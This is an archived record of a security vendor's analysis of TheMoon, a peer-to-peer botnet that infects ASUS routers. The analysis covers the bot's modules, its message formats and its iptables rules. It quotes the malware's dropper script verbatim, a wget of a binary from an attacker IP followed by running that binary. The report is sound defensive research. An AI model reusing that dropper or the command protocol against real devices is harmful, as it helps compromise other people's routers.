{
	"id": "ce009743-684b-4d6e-8b14-09229a21b9c2",
	"created_at": "2026-04-06T00:14:09.623471Z",
	"updated_at": "2026-04-10T13:11:57.748247Z",
	"deleted_at": null,
	"sha1_hash": "064cae9707f1e2a539e2dc802818cc83e07c9a98",
	"title": "TheMoon - A P2P botnet targeting Home Routers",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 260185,
	"plain_text": "TheMoon - A P2P botnet targeting Home Routers\r\nBy Bing Liu\r\nPublished: 2016-10-20 · Archived: 2026-04-02 11:36:36 UTC\r\nIn the post “Home Routers - New Favorite of Cybercriminals in 2016”, we discussed the active detection of\r\nvulnerability CVE-2014-9583 in ASUS routers since June of this year.  In this post we will dissect a bot installed\r\non the affected ASUS routers.\r\nThe following figure shows attack traffic captured through Wireshark.\r\nFigure 1 Exploitation of CVE-2014-9583\r\nBelow is the content of file nmlt1.sh downloaded from hxxp://78.128.92.137:80/.\r\n#!/bin/sh\r\ncd /tmp\r\nrm -f .nttpd\r\nwget -O .nttpd http://78.128.92.137/.nttpd,17-mips-le-t1\r\nchmod +x .nttpd\r\n./.nttpd\r\nhttps://www.fortinet.com/blog/threat-research/themoon-a-p2p-botnet-targeting-home-routers\r\nPage 1 of 10\n\nThe vulnerable ASUS router will  download and execute the binary file .nttpd from the attacker controlled\r\nwebsite.  The following figure shows its MD5 hash and file attributes:\r\nFigure 2 md5sum and file attributes\r\nA simple search shows that this bot was analyzed here.  However, that analysis was based on sample MD5:\r\nc44f2d8ad37c18ea84a99db584d6992d, and some parts are misleading, so we want to share our updated findings\r\nin this post.\r\nThis bot belongs to the TheMoon family of malware, which shares the following program structure.\r\nhttps://www.fortinet.com/blog/threat-research/themoon-a-p2p-botnet-targeting-home-routers\r\nPage 2 of 10\n\nFigure 3 Program structure of TheMoon family\r\nThe differences between the family members are mainly located in functions os_init and run_modules.\r\nThis bot inserts the following eight iptables rules in function os_init.\r\nFigure 3 iptables rules\r\nThe first rule stops other attackers from exploiting the ASUS vulnerability CVE-2014-9583, while the second one\r\nstops other attackers from exploiting the Linksys Unauthenticated Remote Code Execution vulnerability.\r\nAll the rest ensure that the attacker has access to this router. We will talk about hard-coded peers later in this post.\r\nIn the function run_modules, this bot launches three modules: “clk,” “net” and “dwl.” Let’s analyze them one by\r\none.\r\nClk Module\r\nThis module launchs two threads.  The first one calculates the running time while the second one maintains the\r\ntime. This bot queries public NTP servers for the UTC time, as shown in the following figure.\r\nFigure 4 Hard-coded NTP servers\r\nThe following figure shows an NTP request sent by this bot, and the response from the public NTP server.\r\nhttps://www.fortinet.com/blog/threat-research/themoon-a-p2p-botnet-targeting-home-routers\r\nPage 3 of 10\n\nFigure 5 NTP request and response\r\nWe don’t believe that these hard-coded IP addresses are C\u0026C servers, as was claimed here.\r\nIf the NTP query fails, the bot will instead use the local time.\r\nNet Module\r\nThis module adds an iptables rule to open UDP port 5143, and then creates a thread which is responsible for P2P\r\ncommunication.  It is worth mentioning that the supported message types are variant-specific, and usually\r\ndifferent port numbers are used for communication.\r\nThis bot supports following three types of message.\r\n1. Register message\r\n2. RegisterTo  message\r\n3. FetchCommand message\r\nEvery message contains a header and a body. All these messages share the following header structure:\r\nOffset                    Size                    Description\r\n0                                 1                    Body length\r\n1                                  1                    Message Type\r\n2                                  1                    TTL\r\n3                                  1                    0x8F (variant specific)\r\nFor every received message, the bot decreases the TTL by one, and forwards the message to its peers if\r\nthe result is not zero. The following figure demonstrates this behavior.\r\nhttps://www.fortinet.com/blog/threat-research/themoon-a-p2p-botnet-targeting-home-routers\r\nPage 4 of 10\n\nFigure 6 Forwarded message to its peers\r\n1. Register message\r\nThe type value of this message is 0. The bot sends this message to hard-coded peers after launching three modules\r\nsuccessfully.\r\nhttps://www.fortinet.com/blog/threat-research/themoon-a-p2p-botnet-targeting-home-routers\r\nPage 5 of 10\n\nFigure 7 register to hard-coded peers\r\nAs you may remember, iptables rules are installed to allow access to these hard-coded peers. The following figure\r\nshows the traffic sent to hard-coded peers:\r\nFigure 8 Register message\r\nThe message body is comprised of two double words: The first one is 0x6d6163f4 (variant specific) and the\r\nsecond is the property value of this peer. The bot adds the sender as its peer after receiving this message.  This bot\r\nsupports 0x64 peers at maximum.\r\n2. RegistertTo\r\nThe type value of this message is zero as well, but the message body is 12 bytes long. If the third double word is\r\nnot zero, this bot sends a register message to a specified IP. Otherwise, it sends the register message to the sender.\r\nThe following figure shows a RegisterTo message received by the bot.\r\nhttps://www.fortinet.com/blog/threat-research/themoon-a-p2p-botnet-targeting-home-routers\r\nPage 6 of 10\n\nFigure 9 RegisterTo message\r\n3. FetchCommand\r\nThe type value of this message is one. The following is the structure of the message body.\r\nOffset                    Size                    Description\r\n0                              4                        Peer IP address\r\n4                             4                         Command id\r\n8                             4                         Command size (Maximum 0x19001)\r\n12                           n                         file name(n\u003c=8)\r\nThe following figure shows a FetchCommand message received by this bot.\r\nFigure 10 FetchCommand message\r\nIf the sender is its peer, the bot stores the message in the following structure for the dwl module:\r\nStruct PendingCommand\r\nhttps://www.fortinet.com/blog/threat-research/themoon-a-p2p-botnet-targeting-home-routers\r\nPage 7 of 10\n\n{\r\nDWORD ip;\r\nDWORD cmd_id;\r\nDWORD cmd_size;\r\nCHAR filename[8];\r\n};\r\nDwl Module\r\nThis module creates a thread which is responsible for handling the PendingCommand information created by the\r\nnet module. This bot connects to TCP port 4543 of the designated IP and sends it the required file name and\r\ncommand id. The following figure shows the traffic captured through Wireshark:\r\nFigure 11 Command request\r\nThe designed IP is supposed to return the requested file. The bot stores the response in the specified file and\r\nexecutes it. The following figure shows a sequence of calls that create and execute the file received:\r\nhttps://www.fortinet.com/blog/threat-research/themoon-a-p2p-botnet-targeting-home-routers\r\nPage 8 of 10\n\n\u003c\r\nFigure 12 download and execute command\r\nWhile we were unable to download a command file for analysis at the time of this post, based on the file name and\r\nsize we monitor, they should be the TheMoon family members.\r\nConclusion\r\nThe TheMoon family was first discovered by SANS ISC in 2014. This family targets routers and installs malware\r\nby exploiting their vulnerabilities. This bot is used on ASUS and Linksys routers based on their hard-coded\r\niptables rules.\r\nWe also discovered that its P2P communication is not as mature as its peers on PCs. For example, instead of using\r\ndigital signing, the botmaster uses iptables to ensure only he can command the bots. Unfortunately, or fortunately,\r\nthese rules can be bypassed. In addition, the communication is not encrypted, which leads to easier analysis and\r\ndetection.\r\nhttps://www.fortinet.com/blog/threat-research/themoon-a-p2p-botnet-targeting-home-routers\r\nPage 9 of 10\n\nFortinet released following detections for this bot:\r\nAV: Linux/Agent.B!tr.bdr\r\nAppCtrl: TheMoon.Botnet\r\nSource: https://www.fortinet.com/blog/threat-research/themoon-a-p2p-botnet-targeting-home-routers\r\nhttps://www.fortinet.com/blog/threat-research/themoon-a-p2p-botnet-targeting-home-routers\r\nPage 10 of 10",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.fortinet.com/blog/threat-research/themoon-a-p2p-botnet-targeting-home-routers"
	],
	"report_names": [
		"themoon-a-p2p-botnet-targeting-home-routers"
	],
	"threat_actors": [],
	"ts_created_at": 1775434449,
	"ts_updated_at": 1775826717,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/064cae9707f1e2a539e2dc802818cc83e07c9a98.pdf",
		"text": "https://archive.orkl.eu/064cae9707f1e2a539e2dc802818cc83e07c9a98.txt",
		"img": "https://archive.orkl.eu/064cae9707f1e2a539e2dc802818cc83e07c9a98.jpg"
	}
}